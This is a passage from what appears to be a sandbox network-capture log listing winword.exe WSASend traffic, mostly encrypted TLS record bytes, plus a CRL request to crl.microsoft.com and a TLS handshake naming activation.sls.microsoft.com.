  576. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010a\\x14\\x88\\x8d$\tyq4\\x10`\\xf6\\x9540q\\xca\\xb9\\xb7;\\xa5\\xa3n\\xca\\xe8\\xf8\\xcb\\xeaq\\x00^\\xae\\x19\\x0b\\x19\\xd6\\xe7\\x13\\x97\\xc0hk_>j\\xa1_\\x821*\\x9b\\xc2@\\xb7\\xbf\\xfd\\xaa\\xfe(\\x8d\\xbf\\xda\\xb9\\x82z\\x9f\\x05\\x08+\\xe5\\x9bv\\x97\\x83\\x19\\x8f\\xe9~\\xb5\\xa6\\xa4\\xec\\x1e'\\x98+\\x88=\\x80xt9\\xc1\\xcci\\xb3\\xde\\x91\\xb0\\x98\\xfb\\xa3\\xc1\\x9a\\xcd\\x0b\\xa6\\xe6\\x03\\xf9\\xaf\\xc0\\xeb\\xf8\\x97\t\\x12$\\xc6wm\\xab_\\x07vxs\\x00\\xc7f\\xfb\\x1a\\x18\\xcc\\xedn\\x97\\xcf/)b\\xc9\\xbfg\\xc6 \\xd6v\\xfb1\\x02\\x1e^~.x\\xafz\\xed\\xfby\\x9e\\xe1cpa\\x17qd\\x7f\\xf0v8b\\x85e\\xe3\\xbf\\xd9\\xcaa\\x03h\\x9f\\xd5\\xc1\\xf5s\\x0e\\xc9#|\\xec\\x85t\\xd7\\x1e\\x04\\xed\\x18:+\\x9f\\xae\\x00\\xab\\x00d\\xcd\\xc8\\x9fk\\xcde9\\xb6\\xf3\\x1a>\\x12\\xb7,\\x00\\x1f~\\x84&\\xfax\\xca\\xeaufc\\xb1`+k\\xf5\\xd6\\x8b\\xb3\\xb7\\xd0\\xd2"
  577.  
  578.  
  579. "http_request": "winword.exe_WSASend_\\xc4\\x00u\\x00pzr\\x10'o$\\xc2f\\x84tb\r\\xdc^ 4\\xb6\\x19\\xce\\xa8u\\xcf\\xb2-\\x86\\x07\\x84\\xa8\\x83\\xdb\\x13\\xfc\\x7f\\xa3\\xe4\\xd3\\xe5\\x8c,\\x0cs\\xa1\\xcf\\xc9/\\x9a\\xdal\\xa4\\xc5e\\x932\\xa7\\x16\\x93\\xd5\\x11\\x1f\\x01\\xf9\\xfe2\\x0e\\xba8\\xeb=\\x1ccb\\x84\\xe4\\xa7\\xbct\\xf2\\xc6\\xaf9\\x12j3p\\x92a\\x801q\\xb3\\x1ek-\\x8f\\xa7\\x96z\\xfd\\xf9\\xc3\\xfc\\xc4s*f\\x86\\xa09/\\xf7\\x9a\\x86\\x8b\\x8c\\x11n\\xc3;\\xd9\\xdd\\xf2\\x80\\xd0\\x81\\xf9\\xf6\\xb0\\x18\\xd9\\xf3\\x85\\xf1\\x08\\xdbp&x:4\\xb2?v\\xb6&eq\\xcb\\x14\\x91i|@\\x81\\x93\\xfe\\xa8kn0\\x01?0\\x02\\x89'\\xe0\\xb5\\xac\\xa7\\x1f\\x95*\t\\xe3\\xf5\\xe9\\x95 \\xf0c\\xce\\xc6\\x93\\x80\\xf5\\xdb1so~:\\xc5u\\x8d~xr\\xf0\\xc1\\x1c>\\xa3\\xd1\\x9e\\x86\\xb1v\\xda\\x15\\x170\\x04\\xdc\\xec*\\xd8\\x044\\x9c\\xa6\\x9c\\xab\\x16w\\xc9\\x98g`f\\xb5#\\x19\\xeb.f\\xe8o\\xcb\\x90bd\\xd9\\xa4&~\\x95\\x95\\xf7"
  580.  
  581.  
  582. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010rv\\x8cv\\xf3\\x1b\\xa6\\xe4-\\xa0\\xbazf\\x9d3\\x12m\\xb9oqe\\xe6\\xec\\x83\\xc3\\xb4\\x8a\\xb2@0\\xd3r\\x1d\\&n=\\x85-\\xdf\\x1by.?\\xf6\\xaa\\x9d^\"\\xd5\\x06\\xd7i\\xdd\\x06\\xcf\\x17\\xd3%8\\xc1\\x97\\xc9w~d\\x1e#e\\x80\\x15\\\\xe0o\\xbc\\x84e_\\x7f\\x96\\x95\\xb9\\xe2\\x8a\\xef\\x99f2er\\x10\\x85x\\xebhw\\x97\\xe0\\xcbg\\xb6x\\xf2a\\x8a\\xfd'\\xf1x5a\\x9f\\xf9\\xbf\\x9b\\xd7;j\\x07\\xb8x\\xf4\\xaa4\\xc2\\xe9\\xf1a\\xbc4\\xec\\x8a\\x8c\\x7f\\x03\\x96%qx~\\xaa\\xd9\\xa9u\\xae\\xd2\\xfa\\xf9\\xf3uf/\\xad.v\\xe1\\x9b\\xb5\\xa9\\xbc\\x1anr\\xcb\\xc2\\x00\\xaf\\xcb\\xa0\\xdd\\x9e\\x0e\\x9c\\x01\\x9e_g\\xd6m\\xec\\xf6\\x08\\x9b\nr\\xecp!xln\\xa7su\\x85\\xd4\\x1c\\x96alz\\x8e\\xc0\\x05\\x13\\xb0\\xb0>\\x19\\xc5\\xf0i\\xfc1\\x1a~\\xc8\\xe6\\xb1\\x93\\x1e>\\xe2\\xb4\\xbd#\\xc0s\\x97\\xae2)=\\xbe\\x8c\\xc1y?\\xab\\xf3gl\\xeb\\x01\\xcfk"
  583.  
  584.  
  585. "http_request": "winword.exe_WSASend_get /pki/crl/products/microsoftrootcert.crl http/1.1\r\nconnection: keep-alive\r\naccept: */*\r\nif-modified-since: thu, 07 mar 2019 06:00:16 gmt\r\nuser-agent: microsoft-cryptoapi/6.1\r\nhost: crl.microsoft.com\r\n\r\n"
  586.  
  587.  
  588. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x7f\\x01\\x00\\x00\\x03\\x01x\\xeea\\xdc\\xbf\\x9fy\\xf4(_r\\x8d\\x9a\\x9aw\\xad\\xa0\\xcc\\xb5\\xa3\\x8fv\\x1a\\xb9i\\x81u\\xba\\xab\\x15\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00:\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00!\\x00\\x1f\\x00\\x00\\x1cactivation.sls.microsoft.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  589.  
  590.  
  591. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xd8\\x1d\\xad\\xfa*\\x96?\\x81\\x03\\xde\\xb0\\x16\\x10\\xdbq\\x7f0\\xf7\\x10\\x90\\xdc\\x8a\\x99\\xaa\\xcah\\xe0-\\xbbj\\xc6u\\xf1\\xd8\\x9c\\x06\\x96e\\x84z\\xde\\xe8k\\x9fu\\xf4\\x92l\\xc1wz\\xd2\\x9f5\\xdc\\xcc\\xe6\\xff:\\xa7r\\xab|\\xcf+u\\x85\\xbc\\xb0(\"rj\\xb5\\xb0\\x82\\x1f\\x04h\\x04\nd\\x88\\x87\\x97\\xd1\\x97;\\x93\\zj\\xf6\\x99(y\\x84\\xc1\\xcc\\xf2\\x94?\\xcf\\xbc\\xe5\\xcd|u<*\\x8c\\x04\\x074d\\x83m\\xde;j\\xdf\\?\\x84u\\xc4\\x1b\\xd5\\xd2\\xa7=x\\x18\\\\xef\\xe3a~&\\x8f\\xa8\\xbfeo\\x90r=\\xe2y\\xab\\xcfun\\xe5\\xbch\\xa3\\xc8\\x9at\\xd3\\x9f\\xd4,\\xcb+\\xea3\\xca^y\\xa1k\\x12\\xdbke$\\x0f\\xc3\\x91\\x81\\xec\\xb8\\x8anb\\x02\\xf9:\\xdeh\\x96\\x18\\x07x\\x8c\\xa2\\x9f\\x85j\n\\x99\\xa2?\\x92\\xef\\xfd_\\xb0\\x8c\\xe5\\xbf\\xb7e\\xa0\\xdf\tc^o\\xf80uf\\x1b\\xb6\\xe0\\x16\\xd9\\xf9fh*\\xde\\x9c\\x17_\tk\\x9f\\x9b\\xc9\\xaej\\xf2\\xdd\\xdf"
  592.  
  593.  
  594. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010(!\\xdd-\\xb6b(\\x8c\\xf0\\xfc\\xda!\\xffb\\x82\\x8f\\x0e\\xb5\\xd4\\xa2w\\xa2'\\x03\\x1e\\xec1u\\x82\\x91\\xea\\xc5u7/\\xc7\\x9f9_g&\\xd2\\x0epp\\x8d\\x9c\\x81\\xdf\t\\x1b\\x94\\x19h&\\x1a\\x9dv\\x0c\\x9b\\xa7pl\\xcd\\xc8\\xca\\x8ew\\x81\\xd9\\xb4\\xec\\xf2\\x988\\xe5l\\xb6u\\xc4\\x02\\xc3\\x9f\\xf5\\xf7\\xd8\\xb7q\\xb7\\xc4t\\xa8\\x1b\\xf7\\x04\\xa5\\xab\\x99n\\xea\\xc6\\x86e\\xb4\\xc5\\x80\\xef@\\xca\\x0ey\\xc0\\xc9\\xf0\\xd7\\x9dtr\\x9b;\\xbe\\xa2\\xd6\\xf9\\xcf\\x1e\\x9c7\\xc9@\\xc6\\x19\\xa7\\xf5d75g:\\xf2a5\n\\xfa\\xa2\\x04\\xaf\\xc9\\x87j\\xdd\\xe1\\xfe\\xc9\\xa9@\\xba\\x15\\xc6\\x8f9\\x95\\xd5\\xa97tz\\x9fp\\xc3-\\xa5\\xf1\\xff?\\xde:q\\xf6(\\xf2\\xc1\\x05ls\\xeb\\xc8p\\x19olh2\\x88\\xc6\\xce\\xc4p\\xf5\\x9a$\\x81s\\x80\\x86\\x86\\xc7_\\x00\\xd8\\xf0q\\x9c\\xf7\\x08\\xa8\\x00k\\xa5\\x17\\xc2\\x01\\x15\\xb9\\x96rv\\xf2\\xea\\xd7\\xe3\\xb4\\xe3\\x1e\\xd8\\xc0u5\\xef\\x97\\x80s\\xe5g`l\t\\x0b"
  595.  
  596.  
  597. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010p\"\\xdb\\xb9\\xec\\x02*s\\xc2\\xb6\\x91\\x96\\xc5/5b6)v#\\xa5\\xb8\\x92\\xa0ub\\xfa:s\\x17q\\xcf\\xb4.d\\x97\\xd8\\x8f\\xa4-\\xd0\\x8f\\x02\\x8c\\x8f\\x1b\\xf9\\xe4b\\xfa\\x12m\\x10\\x86x0_~\\xf8\\x11\\xca4\\x00\\xd5\\xf5s(z$l\\x95z\\x88\\x9c=\\xb8\\xcc\\x05\\xdbd\\xf2c\\xa6&s\\xe4\np\\x0bw\\x9f\\x01\\xd6\\xbe\\xf8(h\\x84m\\xa4)\"e\\xed\\xe43_\\xd1v\\xc8\\xca\\xb5\\xe2\\xc6\\xd0\\x9c\\x99zy\\xa6\\x1e\\xc4\\xca\\xe1&\\x1c\\xd6:-x\\x14\\x97\\xae\\xe07\\x88f\\xb7i8\\xb3qb\\x87\\xa1\\xe2\\x15v_\\x03\\x9b\\x99\\xee\\xd0\\xd1/\\x1a\\x80\\xcf\\xcbze\\x1e\\x89\\xbd5\\xd0j\\xee\\x1c\\xa8\\xf1,\\xafafc\\xf3\\xa2\\xf7\\x1ao\\xbf\\xcb\\x80\\xeb)\\x9b+\\xf0\\xb7 \\x81x\\x0f0\\x93\\x82k\\x80\\xed1n\\xc5\\x83\\x12\\x18y\\xb0\\xe7\\xc8y\\xbfs\\x0cx.\\xd2\\x11\n\\xcdi\\x8c\\x0f==i\\xe8v\\xcfu\\xb6\\xa0\\x1bc\\xe2\\x9bby'\\x7f_\\xb1\\xb6\\x00\\xf0.\\x16"
  598.  
  599.  
  600. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x0109\\xb0\\xae\\xfe\\xf2\\x95u#\\xfa\\xd0\t=\\x8b\\x9f\\xb0\t\\xd9\\xbe\\xe9o$8\\xc6\\x82\\x9f\\x8dv\\xf50\\xacc\\x05\\xde\\xd26 p\"\\x94\\xb7_\\xad\\xda\\x0eq\\xc5\\x94\\xeb\\x1f\\xba\\xe4\\x02\\xe8\\x03\\xd1g\\x12\\xd0\\xac\\x9a\\x9b\\xa15\\x9e\\xc7\\xc0\\xc2\\xc2\\xc7\\xb4e\\xb9\\xfc\\x0e\\x93\\xc5\\x95\\x9b\\xbf4.\\x1c\\x93\\x92\\xa3^7\\xf0\\xb8\\x06=l\\xa7\\x07i\\xfe\\x01\\x80\\xb9f\\xda\\x9a\\xc8=w\\x8a\\xf8\\xd1\r7\\x11=qt\\x88\\xf4,\\xday\\xe5\\xb5\\xdc\"\\xe8\\xb6\\x7f\\xb7\\x04ut\\xfd\\x83m|\\x99#\\xe6exwb\\xe8\\xcb\"\\xe2\\xf6\\x8d\\xb2\\x18x\\xf9\\xba~o\\x8e\\x04v\\x81\\xb6\\xb6\\xbd\\xd5\\xd2a\\xae3\\xd3\\x8ap\\x80'\\x91\\x16\\xacl-\\x86jo^r\\xa6\\xee\\xb7\\xdf\\x88\\x17\\xc5<g\\xe5y\\xc8\\x8f\\x9b\\xc3\\xa1+\\x19\\xdfj\\xfb\\xb9\\xb1\\xfa\\xc4\\x9co!\\xf1\\xf6\\xdb:g\\xc2\\xa5\\xe0\\xea\\xf5\\xb6\\xf9\\xd4j>\\xa0v\\x0e)l\\x9a@\\xd5p\\xf1kzx8\\xffnxc\\xa4q\\x1c/g"
  601.  
  602.  
  603. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xea\\xeeg\\x1d\\xba\\xfc\\x8c.q\\x8bvk\\xaa\\xe4-\\xda-\\x1d\\x1f\\xab\\xb0\\xcc\\xff@\\xd6\\x91\\xd7\\x89\\@\\xd0\\x13\\xac\\xee\\xb5>\\x84\\xb5\\x15\\xc5ql;a\\x07'\\x0cg\\xbc\\xc9\\xebh\\xb7<\\xf3\\xcb^\\xa1\\xaat\\x85\\xdd\\x8dc\\xcb\\xf2f\\xc5\\x18\\xa8\\xb9\\xf9\\xef\\xad\\xeb\\xda\\x18:j\\xab\\x1e?\\xd3\\xa95l\\xdbd\\xd6\\xb3ja\\xeauobh\\xc7\\xbb\\xf9^v\\x1f\\xf8\\x07\\x80\\xce;:\\xe9r)\\xb4f0\\xd9\\xb2\\x8e\\xb8a\\xbd\\x9e\\x8ct\\x0f\\xc8!`\\x87\\xc2\\xe5\\x84p\\xf9\\xcfg@\\x80\\x0cfg\\x7f\\x00\\xc2\\xbb\\xf5\\xf1\\xf6\\x02\\xc6\\x94*\\xe9\\x12oy\\xe8\\x157\\xaa%5\\x1a\\xca\\xcen\\x97b>\\x8a\\xdc\\xccf^\\x90\\x95\\x17\\xa8\\x1d\\xf1'\\xff\\xc9\\xb5\\xb4\n\\xba)m\\xf4\\xc9\\xd5\\x0ef0\\xc1\\xcd\\xf7\\xdc2\r\\x9f\\xb1/aeeu<7\\xdb\\x88\\x1amp^?u\\x0c\\x96_l\\xe6\\xe4u\\xb5\\xbf\\xcd\\x01\\x1di\\x959(u\\x19\\xdb;x\\xb5!m\\xe8\\xf6\\xce'\\x0e\\xa8"
  604.  
  605.  
  606. "http_request": "winword.exe_WSASend_\\xea\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04z\\x8cvwo\\xb2v#w\\x12\\xdb\\xb4\\xe0/\\x0c\\x9731\\xa0\\xf6,z\\x8b\\x86.d\n\\x88\\x04\\xdb\\xc4\\x8d\\x99\\x7fb\\xe5^\\x7f\\xf6\\xb2l\\x85\\x19 \\xb3pa`\\x83\\xcf\\x8e\\xe1\\xb5\\xa2\\xa7x\\xb4\\x11\\xfct\\xd9\\x0ej\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xe9\\x99\\xd1\\xef\\xd8\\x11\\xcc\\xb9\\x1bd\\xbe\\x0b\\xbd\\x85*\\xb00\\xb5\\x9a*.\\x08\\xe4\\x14*\\x95g+#m\\xfdtx\\xbd\\xd0\\xdbn*\\xdeyh\\xaf\\xa8\\x90\\xc6^\\xd0"
  607.  
  608.  
  609. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x0109\\xd5\\xa8\\x0c\\xa8m\\x1d$xp<\\xd58\\x94s(\\x92q/\\x98\\xe0t\\x980\\x04|\\xfe\\x90.,t\\x9a\\xee9,\\xa3\\xd3\\xb6n\\x07\\xc8\\xbb\\xcfm\\xc2\\xd8\\xc4\\x89'\\xda2\\x91;\\xd66awy\t\\x84\\x8bv\\xd72\\xabx\\xearb\\xd2\\xe5z|\\xe9\\xb3\\xdb\\x8bg\\xc4qx2\\xb4c\\xc9\\xfa\\xe7\\x10\\x9f\\x83\\x1b\\x8a7h\\x91\\x0c\\xf5z\\x1b\\x98\\x01wu\\xa4\\x87.\\x17\\x02\\xce\\xf7\\xc8\\xb6)8\r_\\x82\\xedy\\x83\\xbf\\xcc\\x00\\xa5\\x11`\\xc2\\x02\\x7f\\x81\\x05w\\x19m\\xa3\\xe0\\\\x07\\x00\\x04\\xebpb\\xa4-p7\\xff\\xb4=\\xa1\\x97\\x89:\\x93\\x06\\xaf\\xff\\xd6\\xc4\\x8c\\xe3\\xf7p\\xee\\x8fe\\x81\\x83v\\xd5\\xa7\\x89\\x04\\xe2oh\\x11\\xc6wiqt:\\xe5\\x1f\\xaf\\xd1\\x9fke\\x8d\\xd8\\xb3'z\\xc0\\xf0\\xa1\\xb0gu\\x9cj\\x14gc@\\xd1\\x8a\\x95\\x1f(\\xebc#\\x955\\xa8\\xc3\\x9c\\xeb\\x84\\xa3%\\xb7\\xa3\\x0b\\xd8\\xe2\\xaa\\xb5_\\xebq\\x95\\xd4\\xd0\\xeecc\\x9e4\\xd0lz\\xee\\x1d\\x9f\\xad"
  610.  
  611.  
  612. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x12f\\xd2b\\xdf\\x8dt\\x92\\xd90(\\x12\\x8d\\xc1\\xe0`\\xd8\\x97\\x1b\\x14'hwn\\xc5\\x10q\\xb2\\xe7g\\xe2q\\x1a\\x8b\\xd2\\x86\\x9f36c\\x07\\xef\\xeer*\\xban3p(^pq\\xba\\xe6\\x9dznu\\xbdr\\xed\\x8diy\\xa8\\xe8\\x9dxsl\\xbf\\xf0\\x0c\\x94\\x1b\\xcfh\\xe9\\x92\\xc7\\xf6:\\xa1\\xd4\\xb5\\x19u9j\\xff\\x1ee\\x80j\\x19p\\xf60\\x90\\xa1n&\\x97\\xce\\x1b\\x91v\\xe8\\x13\\xf0,\"\\x19\\x1dq\\x8f\\xdf\\x16\\xe2\\xd4\\xce\\xa6\\xa1k\\xd8\\xe8\\xc8\\xc5\\xfc\\x10\\x91\\xfe\\xef\"\\x18\\x8a\\x93\\xcf\\xab-\\xe19f\\x01e\\xaa\\xdb\\xc0\\xf9\\xb6>\\xa4$h\\x96y\\xee\\xc9\\xf9\\x1c\\xc6k'\\x98\t\\xac'\r=\\x88\\xe8\\x9e\\xf4\\x1a|\\x1d\\xa1m\\xab\\xd9\n\\x02b>\\xdc\\xc4\\x04n\\x91q\\x9e~\\xad\\x1fni\\xfd\\x13b\\x85~\\xcd\\xbd\\xe9\\x17\\xddtt!\\xa1c\\x82\\xcf\\xb4\\xb7e\\x91\\x0e\\xefg\\xc2\\x1c\\x9di\\xdbv\\xa7\\x87a\\xaf\\x88\\xed\\x97&\\x06k#+\\xaf;u\\xfd\\xb3_#b"
  613.  
  614.  
  615. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xd6u\\x06o\\xb7\\xf87\\x7f\\x83-\\xe4\\xac)q\\x0c)\\xd6\\x95\\xc0\\x18h\\xf8\\xe5>l\\x89\\xaa\\x18\\x8c\\xad\\x81?a\\xcd71\\xf0\\x89\\xd70\\xa1<vh\\xee\\x9d\\xd7\\xd3\\xbf\\xf7*\\x0c\\x8e\\xf4\\x9ancr\\x11o'q\\x8b\\xa8\\xcbi3\\x11p\\xff\\x89\\xca\\xc8\\x8c\\xe4\\xfe\\xc0\\xcd^\\x1dt\\xf8\\xed\\xbb4p\\xeas\\xbc\\x00g\\xd4\\xf3\\xe9\\x93\\x8d\\x13\\xc5w\\x93\\xa7\\x1b\\xc0\\xc9\\xac\\x00\\x85\\x1de\\xde\\xfb\\x01\\x0c\\x16-\\xb9\\x10kx\\xe7.\\xbc\\x03pa\\xe5\\xd9\\x04\\x13\\xd0x`\\xf8\\xd1\\x9e\\x1e\\x82\\x87<z\\xa9\\xc4\\x10rj\\x12\\xf2\\x95\\xb2g\\xc9aavw\\x98\\xefa,\\xbc_\\x18\\f\\xeaa\\xf1b\\xa3\\xcc\\xed\\xa6>%8\\xc6w\\x1cau\\x93\\xfc\\xcc\\xe8v\\x13\r\\xb4\\x8d\\xe8\\x00ik;\\xe6\\x04\\xc1b\\xafo\\xfab\\xf9\\x0f\\x9a\\x80\\xd1\\xdeq*\\xe2\\xc7\\xf4\\x9fg`\\xbb\\xda\\xd9\\xe4@\\x8ayh\\x03u\\x94v5u\\xb3\\x905\\xee\\x9d\\xde\\xaf\\x85\"/\\xedq\\xd7bw\\x1f\\x19q"
  616.  
  617.  
  618. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010m\"\\x8c\\xff\\x061\\x06z\\xaf4|r2u\\xe2\\xb4\\x1ai\\x8a\\xbf5&,s\\x7f;y\\xcfaf\\xf3\\xbaf8\\xc0\\x84\\x10\\xe1a\\x1e\\xdaj\\xa4\\x9e\\x84\\x87\\xf0\\xdf\\x81\\x91\\x0f\\x8f\\xc5f\\xa0\\xd9\\x8e\\x1e\\xfb\\x16\\xc2\\xc9\\xafv\\x8b\\xec=\\x97\\xa6=v\\xbf\\x86\\xba\\x9e\\xcd(\\xd7\\x93*\\x07\\x15t\\x01\\xc2b\\xf7\\x96\\xa5\\xa4,\\xe8x\\x0f\\x18\\xd5\\xbd?\n\\xb3#c -\\x06\\x00dc\\xf1o+\\xb0=$\\xd3\\xe9\\xb9\\x1e\\xfah1\\xdf\\xfe\\xd5-a/la\\x02z\\xcd\\xebk9\\xa0\\x19-\\x95x\\x1adc\\xa9xi\\x90\\xa0\\xd9\\xa3\\xae\\x0f\\xf2\\xd1cz\\xd1\\x8e\\xca\\x04\\xbd~\\x94\\xdb\\x87\\xcb\\xd2\\x1eu'\\xdc\\x03\\xbd\\xe5\\xeb \\xa7y\\xcc\\xc0h\\x8f\\x94\\xc3\\xd1+\\xadx\\x06\\xbeal|\\xd85\\x93\\x0e3\\xe1@\\xf6\\xff\\x87\\x82\\xbe\\x83\\xb4\\xf1\\x93f#\\xb7)!\\x1d$iiy\\xbf\\xe1\\xf7\\xe4\\xcei(\\xe1\\xe0\\xd9\\x00u\\xfe\\xd1\\x81##\\x1d\\xed\\xf9p\\xc2\\xa7\\xbfq.h\\xde\\x94"
  619.  
  620.  
  621. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x96\\xbfe\\xe78\\x8f\\xc2 i\\x83i\\x93x\\xf5\\x0b\\xf4\\xa1$z\\x01\\xe5=\n\\xf4\\xc6\\xeb\\xad=\\x1bm0\\x88\\xa0\\xec\\xb0q.\\xaa\\x06\\x81\\x10)\\x83\\xa5bci%\\xae\\xc9.\\xc5\\xef\\x86\\xd4\\xdaj\\x14i:#\\x97=\\x96\\xc4\\x91\\x91\\xed\\x0b\\x17\\xd7 \\xf7r\\x81\\x9a0\\xb7\\x92e\\xd4;\\xae\\x84\\xbd\\x9c\\x02@\\x8a\\xf8n\\x8cjv\\xca\\x1c3\\xbc \\xc8\\xb1\\xfb\\\\x07n-\\xf3\\x14\\xacm\\x80gw\\x06\\x94\\xcf\\xd5\\xf6\\xa6\\x98m\\x1c\\xb3\\xe7 `\\xd0\\xee\\xf4\\xea\\xaas\\x01|\\xd7\\xb5\\'\\xefv<\\xd2$\"\\xfa\\xd0g\\xbd\\xe2d\\x909<p\\x03\r\\xff\\x84a\\x1c\\xa1\\xe6\\x1d\\xf2\\xc9\\xf7wm^\\xb7\\xc9\\xc6~z\\x94\\xa0 \\xd4\\xa7\\x03\\xc4\\x98n\\xe5\\xd5\\x1d.i)\\xf2;|\\x00\\xec\\xa9\\xe4h)\\xff\\x95\\xa6\\xdf\\xef\\xba\\xf1\\x8f\\xc1\\xece\\x1e(\\x80\\xc7\\xbc\\x17\\x82\\x80\\x9d\\x0b>\\x04g\\x17\\x02\\x87\\xd3=n\\x88j\\xcc\\xcc\\xe6\\x06\\x91gp\\xe1g\\xa4\n\\x976\\x04\\xddt\\x90\\xa9v\\x8d"
  622.  
  623.  
  624. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xca\\xcf\\x12\\xc7\\xddkcd\\x06\\x82\\xd5\\x943if|\\x9c\\x888\\x98\\x83\\xb4\\xc2\\xd5\\xca:m5\\xfaki\\x05\\xaf\\xe6\\x83^:\\x1b,\\x7f0j\\x05\\x0ex'\\x8bf\\xe5\\xdf\\xea2\\xc1\\xf5\\x17\\xb4\\xb5\\xf1\\xb0ud_e\\x0f\\xa7\\x9b\\xda\\xda\\x88\\xf4e\\xb8\\xc8\\xd5\\xde>n\\xcf^b\\x9e5\\xfd;\\xdf\\x16ps\\x1e\\xbe\\xb7\\x1a5\\xf2rkj\\xa8v\\xc1l\\xa0^g)\\xa3\\xd9\\x9e\\x17\\x11e9\\x00\\x86\\x06\\xcf\\xec\\x13,\\x8b\\xf5\\xa3\\x1fw2\\xcf\\xf2\\x8fe,\\x16\\x8e\\xac\\xd9bj\\xa5\\xaf\\xba\\xc3kw\\xa9\\xd7\\xcb\\xdc\\xc7sr\\xaf\\xe6\\xe6\\x87\\xf6\\x8d\\xd7\\xc9\\xcf7\\xae-\\x9261\\x9f\\x01\\\\xc2\\xd1c9k(\\x07\\xe7\\xe9\\xbe\\x9c\\x03\\xfc\\xc7u\\xe8>\\x91\\xa9\\x07\\xa9\\x92\\xfb\\xc1\\xd0b.9\\xc2\\x9a\\xf98\\xe9\\xaa\\xe3\\x90\\x10ehg\\x86\\x8b\\xa9\\x12z\\xbe\\xfb|h\\xb5\\xc1\\x01j\\xd1\\x9a\\xcb\\xe2m\\xb5\\xadn&\\x1a$i#\\xff\\x1a\\xad\\xdf/\\xf0\\\\xe7\\xf8\"!\\x83\\x8f\\x8fo"
  625.  
  626.  
  627. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xfd9e\\xa2.x\\xbb\\xe1\\x8br\\x960\\xb1\\xd5\\\\xb8 h\\x9e\\xd7vda9=-\\x8f\\xa7\\xbb\\xc5;\\xf8\\xaa\\xbf\\\\xa9\\xc1r\\xb1wb\\xf0w\\x9f\\x1eb\\xdcy\\xd3w\\x91\\xff\\xe6;\\xb3b\\x89\\x8b\\x1adqg\\xc9\\x93q\\xa3\\xf3u\\*\\xfc\\x8d\\x8f\\xba\\x00\\xe2wm\\x15\\xfa&\\x01s\\x9e<\\xcft\\x9f\\xb2\\xf5yq*aw\\x8ek\\xbf\\xa7\\xffj\\xc0i\\x08bn\\x95\\xc3\\x1e\\xcf\\xc2v\\x8f\\xbf\\x01`\\xca\\xf7\\x9f\\x0f\\xecn\\x1d~|\\xfc\\x05\\x11\\x12\\xbc\\xb5p\\x93i\\xacd+\\xd3\\xdc=\\x99\\xd0(\\xf1dqj\\x9c(\\xad\\x82\\xb1\\xaaa<i\\xdd\\x06\\xe1\\x0f\\x8f\\x14\\xb2\\xac\\x04\\xd9\\xc8\\xfe\\xd1w\\xf5u\\\\\\xac\\xde\\xafsg\\x04\\xa7:uc\\xc5\\xc6\\x80\\xdb\\xb2?~\\xb3l\\xc9\\xd4\\xe1)\\x1a\"\\x99\\xe7+\\xdb\\x12\\xa3\\xca/\\xe0\\xa6\\xcb\\xbd\\xcb\\xaf\\x8d\\x90>h\\xab#\\x89wp\\x9e\\xa0\\xa1+^\\x97\\x1f>\\xe0`\\x8b\\xd8\\xfctv\\xed\\x08\\xcbw\\xa4\\x9eo\\x08\\xc8-\\x85"
  628.  
  629.  
  630. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x1b\\x02\\x00r\\x84\\xb3\\xe0c~^\\x9drz9=f-\\xa9\\xb4\\xf7;~as\\x90\\x11f\\xa7>\\x1b\\x96\\x08:\\xb1\\xd3`e\\x07\\x96h\\xe4g\\xfb\\xb2\\x7fce\\xa3\\x0e\\xfd\\x9d\\xc7\\xd0\\x1f\\xa0b\\x07\\x9e\\x1d\\xfd\\xa5\\xe2\n\\xe5\\x94yb\\x8brl\\x15s\\x046w\\xd3\\x80\\xb87\\x11\\xe0\\xfc\\x18wt\\xa78\\x96\\x03\\x86\\xc7x\\x82?\\x1c\\xe59\\xe29\\x8b\\x05>e\\x12\\xbf\"%\\xf1\\x83\\x80*b\\x04id\\x04\\xc8h\\x8f\\x01;p\\xad|*\\xd4h\\x10(\\x19gj\\xb8lzry\\xf0\n~n)\\xefv\\xc4\\xab\\x86l\\x03\\x8b\\x8b\\xef\\xf9\\xc6\\x00\\xf6|\\xcf\\x1c,\\xb7+\\x88\\xcf\\xcd\\x18\\x14'\\x9e\\xf3\\xaa\\xae\th\\xef\\xfe\\x98\\xdc\\x022\\x1b\\xe9\\xe3\\x81\\xaf\\xdc\\x14\\xa5e\\x11\\xa2\\x07v\\xa8\\x1e\\xbe\\x938n~\\xa4\\x1e\\x03\\x1a8\\xd8\\xc3\\x9bb\\xe4\\x18\\xfe\\x8ej\\x14+\\x84\\xe6\\x9f<\\x9a.\\xb0q\\xdf\\x0b?\\x9c\\xf9\\xf0\\x07y\\x8b\\x19\\x99|\\xc2\\x122\\xb8\\x08\\xb4\\xd9\\x04\\xd9\\x9dq6"
  631.  
  632.  
